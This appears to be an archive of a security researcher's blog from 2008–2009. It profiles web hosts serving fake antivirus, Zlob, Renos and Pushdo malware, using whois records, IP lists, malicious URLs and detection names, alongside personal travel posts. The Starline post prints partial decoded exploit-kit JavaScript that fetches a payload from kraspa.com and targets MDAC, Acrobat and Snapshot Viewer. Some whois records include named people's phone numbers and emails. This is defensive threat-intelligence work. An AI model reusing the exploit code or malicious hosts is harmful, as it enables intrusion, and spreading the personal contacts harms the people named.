I have decided to change my webhosts in order to provide a better experience to my readers and to re-brand the blog under my own name. I started this blog with a wordpress.com account as a trial and I’ve been very pleasantly surprised by the feedback and interest the blog has received. So to get more flexibility I’ve moved to a proper webhost. The blog will be in a bit of a state of flux as I transition to http://www.martinsecurity.net . Stay tuned.

Traveling has been keeping me pretty out of the loop, but I happened to stumble on the Social Security Awards contest where the winner will be announced at the RSA conference this year. Needless to say,  I would appreciate your votes in the Best Technical Security Blog area.

Vote here:  http://www.socialsecurityawards.com/

I shall resume regular updates in May upon my return!

While catching up on security news in an internet cafe in Buenos Aires, I came upon the news that the newly elected US president Barak Obama is going to be the first president to use a blackberry.

Article http://blog.wired.com/business/2009/01/obama-gets-to-k.html

With there being some buzz around blackberry security, it’s a good time to mention the paper I wrote for SANS on mobile device forensics.

It can be found at: http://www.sans.org/reading_room/whitepapers/forensics/mobile_device_forensics_32888?show=32888.php&cat=forensics

The paper covers how to investigate a cellular phone (Motorola Razr), smartphone (blackberry) and MP3 player to gather information, recover deleted data, etc.

Since we normally only live once, I’ve decided to take an extended vacation.  Thankfully my employer has been kind enough to let me take a 4 month leave of absence. I’ll be using the time to learn Spanish in Buenos Aires and then continue traveling through South and Central America.

Maybe I’ll post some photos along the way to make all my readers jealous

Happy hunting,

RealSecurity

The absolute worst culprit that I’ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here.

person: Perevitskiy Sergey
address: Russian Federation,
address: St. Petersburg, Fedosenko st, 30 liter A, 24-N
mnt-by: STILLTRADE-MNT
abuse-mailbox: abuse@still-trade.com
e-mail: perevitzky.sergey@still-trade.com
phone: +7 (960) 257-87-90
nic-hdl: PERE1-RIPE
changed: lexa@wahome.ru 20080624
source: RIPE

Still Trade hosts a ton of fake/rogue anti virus domains and applications. We’ve seen these hosts pop up recently:

91.208.0.220
2008-12-01
scanner.rapidantivirus.com /setup/setup.exe – Fake AV

Trojan:Win32/FakePowav
FraudTool.Win32.ExtraAntivir.c
Win32/FakeAV!generic

91.208.0.221
2008-12-11
myprivatetubes09.net /cd/650/1749/wmpcdcs.exe – Zlob

DR/Zlob.Gen
TrojanDownloader:Win32/Renos.HB
Mal/Emogen-G

91.208.0.253
2008-12-03
myprivatetubes2009.net /cd/650/1663/wmpcdcs.exe – Zlob

Same as above

The following IPs are associated with malicious applications:

91.208.0.220
91.208.0.221
91.208.0.223
91.208.0.224
91.208.0.225
91.208.0.228
91.208.0.229
91.208.0.230
91.208.0.231
91.208.0.234
91.208.0.235
91.208.0.236
91.208.0.237
91.208.0.238
91.208.0.239
91.208.0.240
91.208.0.241
91.208.0.242
91.208.0.243
91.208.0.244
91.208.0.245
91.208.0.246
91.208.0.247
91.208.0.248
91.208.0.249
91.208.0.250
91.208.0.251
91.208.0.252
91.208.0.253
91.208.0.254

BISS also has a comprehensive list of domains and malware being served by these guys.

Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C as reported by Fireeye.

inetnum:        92.62.101.0 - 92.62.101.255
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed:        roman@compic.ee 20080403
e-mail:         info@starline.ee
abuse-mailbox:  abuse@starline.ee
source:         RIPE

The Yahoo article has lots of great information on the relationship between Starline and it’s upstream providers, so I won’t delve into that here.

Here are the hits I’ve seen from their IP space:

92.62.100.0 – 92.62.101.255

92.62.100.68
2008-11-05
plotfive.cn /load.php

2008-11-12 /cache/doc.pdf

2008-11-22 /cache/doc.pdf

92.62.101.13
2008-10-24
tgspk.cn /zpl/pdf.php

92.62.101.53
2008-10-30
blufda.com /eez3a893/spl/pdf.pdf

2008-11-26 /u8899r5v/spl/pdf.pdf
/u8899r5v/exe.php

2008-12-17
kraspa.com /yg6cv7ar/spl/pdf.pdf

92.62.100.44
2008-09-18
92.62.100.44 /1/
/2/
92.62.100.43
2008-09-17
92.62.100.43 /1/
/2/

There’s quite a history here. From the looks of things, someone has been
moving around their malware from domain to domain on 92.62.101.53. All
of these sites are down as of this writing except kraspa.com. Lets dive
further into this site.

The first page I saw was kraspa.com /yg6cv7ar/spl/pdf.pdf however
this is not the whole story. When investigating that exact URL, pdf.pdf
is not found. This is curious as I saw the site earlier today. Backing up
to the root of kraspa.com, we get an index page. The index page contains
an iframe that points to a different directory. The malware author must
have coded his site to rotate directory names based on a certain criteria.
This makes investigation difficult if you can’t figure out where it will
send victims to next.

The next iframe I got contained:

src=”/ov9632l9/index.php”

The next page that comes into play is the exploit script index.php which
is detected as:

Trojan-Downloader.JS.Psyme.alv

Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and
the Microsoft Access Snapshot viewer. Here’s some of the script:

var p_url = “http://kraspa.com/ov9632l9/ztt.php”;
function MDAC(){

var nuc=”;
d8= 0;
var koSZV = document.createElement(“o”+nuc+”b”+nuc+”je”+nuc+”c”+nuc+”t”);
koSZV.setAttribute(“id”,”<”+nuc+”?=k”+nuc+”o”+nuc+”S”+nuc+”ZV?”+nuc+”>”);
[....]
function PDF()
{
document.write(‘<iframe src=”spl/pdf.pdf” width=1 height=1 style=”display:none”></iframe>’);
[....]
function SS()
{
var arbitrary_file = p_url;
var dest = ‘C:/AUTOEXEC.BAT’;
document.write(“<object classid=’clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9′ id=’attack’></object>”);
[....]
if (MDAC()||PDF()||SS()) { }
Detections for the malicious pdf:

JS:Agent-BQ
Exploit.RealPlr.K

The payload is a file called ztt.php, here are a few of the detections:

Trojan.Win32.Delf.gpg
Troj/Dloadr-BZT
Trojan.Win32.Delf.fyl

A quick submission to Threat Expert (report) and Anubis (report) reveal
further binaries that are downloaded. The .dat files are not exes, but a
type of binary data file.

From ANUBIS:1033 to 92.62.101.53:80 – [kraspa.com]

Request: GET /flo/zro.dat

Response: 200 “OK”

Request: GET /flo/mp.dat

Response: 200 “OK”

Request: GET /flo/3rkour.dat

Response: 200 “OK”

Of particular interest is 79.143.177.43, another Latvian host with a
small /24 network. Might be worth keeping your eyes open for them too.

inetnum:        79.143.177.0 - 79.143.177.255
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT

From ANUBIS:1036 to 79.143.177.43:80 – [79.143.177.43]

Request: GET /myfiles/95/139/file.exe

Response: 200 “OK”

From ANUBIS:1037 to 210.83.85.100:80 – [orzsys.cc]

Request: GET /files/20026.exe

Response: 200 “OK”

Some detections for 20026.exe, and file.exe:

BDS/Hupigon.Gen
Trojan.FakeAlert.Gen!Pac.2

Trojan.Crypt.LooksLike.XPACK
Trojan.FakeAlert.Gen!Pac.2

The FakeAlert signatures are correct, the threat ultimatly installs some
fake anti virus / anti spyware application.

One of the smaller hosts I’ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We’ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP 84.243.196.0 – 84.243.197.255.

inetnum:        84.243.197.0 - 84.243.197.255
netname:        GFX-CUST-PORTNAP
descr:          PortNAP Internet Services
org:            ORG-PIS13-RIPE
country:        NL
admin-c:        GFX-RIPE
tech-c:         GFX-RIPE
status:         ASSIGNED PA
mnt-by:         GFX-MNT
changed:        noc@grafix.nl 20081021
source:         RIPE
abuse-mailbox:  abuse@grafix.nl

84.243.196.136 2008-12-02 – site down
pro-scanner-online.com /2009/download/trial/A9installer_880473.exe

84.243.196.137 2008-12-02 – site down
protected-downloads.com /download/trial/AV360Install_77014205.exe

84.243.197.183 2008-11-20 – site down
protection-livescan.com /2009/download/trial/A9installer_880290.exe

After a weekend hiatus, I’m back with the next host of interest – ZlKon.

role:           ZlKon HostMaster
address:        Lilijas iela 4-74
address:        Riga, LV-1055
address:        Latvija
phone:          +371 26330593
e-mail:         hostmaster@zlkon.lv
admin-c:        AD5952-RIPE
tech-c:         AD5952-RIPE
nic-hdl:        ZK508-RIPE
mnt-by:         ZLKON-MNT
changed:        hostmaster@zlkon.lv 20081125
source:         RIPE
abuse-mailbox:  abuse@zlkon.lv

Based in Latvia, Zlkon seems to have a high ratio of bad IPs to it’s small
address space. A customer of the larger DATORU EXPRESS SERVISS, Zlkon
has two /24s 94.247.2.0 – 94.247.3.255.

% Information related to '94.247.0.0/21AS12553'

route:          94.247.0.0/21
descr:          "DATORU EXPRESS SERVISS" Ltd.
origin:         AS12553
mnt-by:         PCEXPRESS-MNT
changed:        igors@pcexpress.lv 20081121
source:         RIPE

94.247.2.11
2008-12-02 – not accessible
pro-scanner-online.com /2009/download/trial/A9installer_880135.exe

94.247.2.183
2008-12-09
fire-movie.com /download/Keygen.Image.for.DOS.2.08c3098.exe
Win32:Fabot
Trojan:Win32/Alureon.gen!J
Worm/AutoRun.ER

2008-12-02
spacekeys.net /download/windows311megaupload_3019.exe
Same as fire-movie.net above

2008-12-12
moonmovie.net /download/moonmovie.v.3.484.exe
Same as fire-movie.net above

94.247.2.215
2008-11-27 – not accessible
antivirus–plus.com /installer_00004.exe

94.247.2.222
2008-12-02 – not accessible
pro-scanner-online.com/2009/download/trial/A9installer_880147.exe

94.247.3.228
2008-12-02 – not accessible
pro-scanner-online.com/2009/download/trial/A9installer_880473.exe

2008-12-12
get-frsh-files.com /MCLiteodecVer.6.20467.exe
Same as files-upload.21.com below

2008-12-13
files-upload-21.com /MCLiteodecVer.6.20271.exe
TrojanDownloader:Win32/Renos.FH

94.247.2.231
2008-12-03 – not accessible
pro-scanner-online.com /2009/download/trial/A9installer_880147.exe

94.247.3.232
2008-12-14
codecdownload.3d-softwareportal.com /exclusivemovie.1518.exe
TrojanDownloader:Win32/Renos.FU
Trojan.Win32.Undef.uhx

So we’ve got some fake antivirus, Renos, zlob, etc. Nothing overly terrible like a banking trojan or spam bot but who knows what else is being hosted in Zlkon’s address space.

The next source of badness I’ll cover is UATelecom (AS44997). With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run in with this host which you can read about here (written in German)

91.203.92.0/22
AS44997

netname: BASTION-NET
descr: ISP UATelecom
country: EU
organisation: ORG-TG39-RIPE
org-name: UATELECOM LLC.
org-type: OTHER
address: Ukraine, Voznesensk, Lenina 52
remarks: ————————-
phone: +38-048-701-05-45
phone: +38-096-380-13-21
phone: +38-096-380-13-26
fax-no: +38-048-701-05-45
remarks: ————————-
e-mail: ipadmin@uatelecom.com.ua
abuse-mailbox: abuse@uatelecom.com.ua

We’ve seen lots of malware from their netblock:

91.203.92.138    2008-10-30 – site down
91.203.92.138    /mix/xcvb.pdf

91.203.92.47    2008-12-09 – site down
advancedscanner.com    /2009/download/trial/InstallAVv_880460.exe

91.203.93.25    2008-12-02
softwareformyvideo.com    /get/1xxx5912940/download.exe

Trojan-Dropper.Win32.Agent.abiq
TrojanDownloader:Win32/Renos.FS
Troj/Zlob-AOX

91.203.93.26    2008-12-02
91.203.93.26    /WinDefender2009.exe – fake AV

FraudTool.Win32.WinDefender.g
AntiVirus2008.AIJ

91.203.93.29    2008-12-03 (more on this below)
easywebsiteauditor.ru    /spl/load.php – SPAM Bot

Troj/Pushdo-G
TrojanDownloader:Win32/Cutwail.S
Trojan.Win32.Small.yrx

load.php (an exe) is downloaded from the index of /spl/. The exploit code has 2/38 detections, JS:Packed-X

91.203.93.68    2008-12-03 – site down
pcantivirusscan.com    /2009/download/trial/A9installertest_880135.exe

91.203.93.81    2008-11-27 - sites down
codecdownload.x-softportal.com    /k-codec.335.exe
2008-12-02     codecdownload.friendlysoftportal.com    /moviecodec.91.exe
2008-12-04     codecdownload.allfilesherefordownload.com    /moviecodec.136.exe

Since easywebsiteauditor.ru drops a SPAM bot I decided to dig a little deeper. When infected, the bot first calls home via a GET to 174.36.201.82

OrgName:    SoftLayer Technologies Inc.
OrgID:      SOFTL
Address:    1950 N Stemmons Freeway
City:       Dallas
StateProv:  TX
PostalCode: 75207
Country:    US

GET /40E8001430303030303030303030303030303030303031306C00000
1A366000000007600000642EB00053098A9B3BE HTTP/1.0

HTTP/1.0 200 OK
Date: Fri, 12 Dec 2008 16:10:22 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Fri, 12 Dec 2008 16:10:22 GMT
Cache-Control: no-cache
Content-Length: 110604
Connection: close
Content-Type: application/octet-stream

The stream contains some sort of obfuscated payload. It then makes a bunch of DNS requests to various smtp servers and starts to send spam. There is also a side channel of some sort that it establishes to 69.46.20.65 over port 2065.

OrgName:    HIVELOCITY VENTURES CORP
OrgID:      HVC-3
Address:    400 N Tampa St
Address:    #1025
City:       Tampa
StateProv:  FL
PostalCode: 33602
Country:    US

This traffic also seems obfuscated with the only readable string below:

L…..9ifnospam.0.exe_url..exe_url……..

From doing a little digigng, this threat really is Pushdo/Cutwail. It’s interesting that the exploit site is hosted in the Ukraine, but the C&Cs are located in the US.

Fireeye article
Secure Works article

Happy hunting!

**Edit 2**

I’d like to thank LeaseWeb for taking the time to respond to this post. It’s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The “fire and forget” mentality of notifying hosts is not effective. If more organizations would take the time to investigate the sites attacking them and provide detailed evidence, the whole community will prosper.

**Edit** Seems this post has already drummed up some interest from several parties.

Let me just start by saying that I am not advocating that any of the hosts discussed here be knocked off the internet. Some people are all for shutting down hosting providers that host a lot of malware, others are not. The aim of this series of posts is to inform the public that there are some other hosts out there worth taking a look at.

Is all of LeaseWeb’s /16 AS bad? Of course not. Do they have a bunch of nefarious customers purchasing service from them? It certainly looks that way, I’m sure policing such a large address space has it’s challenges.

The more people that know where the badness comes from, the better. If there is a case to take down a host, that case comes from the community.

**Edit**

Given the recent interest in web hosts such as MCCOLO and the success that security researchers have achieved in taking them down, I decided to look for others. Over the next several days I will post details on some shady web hosts from various parts of the world. This is by no means a definitive list, it is just a start. Hopefully others in the community will go check their logs/IDS and find more information.

If I had more hosts, maybe I could call this series of articles “The week of shady web hosts”
Today’s host is AS16265 LeaseWeb AS Amsterdam, Netherlands.

netname:        LEASEWEB
descr:          LeaseWeb
descr:          P.O. Box 93054
descr:          1090BB AMSTERDAM
descr:          Netherlands
descr:          www.leaseweb.com
remarks:        Please send email to "abuse@leaseweb.com" for complaints
remarks:        regarding portscans, DoS attacks and spam.
remarks:        INFRA-AW
country:        NL
admin-c:        LSW1-RIPE
tech-c:         LSW1-RIPE
status:         ASSIGNED PA
mnt-by:         OCOM-MNT
changed:        ripe@leaseweb.com 20071015
source:         RIPE

Information related to '85.17.0.0/16AS16265'

route:          85.17.0.0/16
descr:          LEASEWEB
origin:         AS16265
remarks:        LeaseWeb
mnt-by:         OCOM-MNT
changed:        ripe@ocom.com 20050311
changed:        ripe@ocom.com 20070610
source:         RIPE

We’ve got exploits and hostile payloads from several IPs in their ranges.
I haven’t had a chance to get virus total results however.

85.17.212.0 - 85.17.212.255
85.17.162.0 - 85.17.162.255
85.17.189.0 - 85.17.189.255
85.17.238.0 - 85.17.238.255

IP              Date       Domain/IP            URL

85.17.162.100   2008-12-08 ad-adnet.net		/xrun.tmp (exe payload)
                2008-11-06 infonews.ath.cx	/data.pdf (exploit)
85.17.212.137	2008-12-01 www.golfinau.com	/stat/index.htm (exploit)
85.17.212.134	2008-12-09 securefilecourier.com	/downloadsetupws.php (exe payload)
85.17.189.153	2008-10-14 www.zifirgad.info	/n_fia/pdf.php (exploit)
85.17.238.144	2008-12-03 85.17.238.144	/74812/a.php (exe payload)

Xentronix network (LeaseWeb)
85.17.166.128 - 85.17.166.255

85.17.166.139	2008-11-05 85.17.166.139	/css/pdf.php (exploit)
85.17.166.229	2008-09-19 85.17.166.229	/gtest2/pdf.php (exploit)
85.17.166.231	2008-10-15 85.17.166.231	/gtest2/pdf.php (exploit)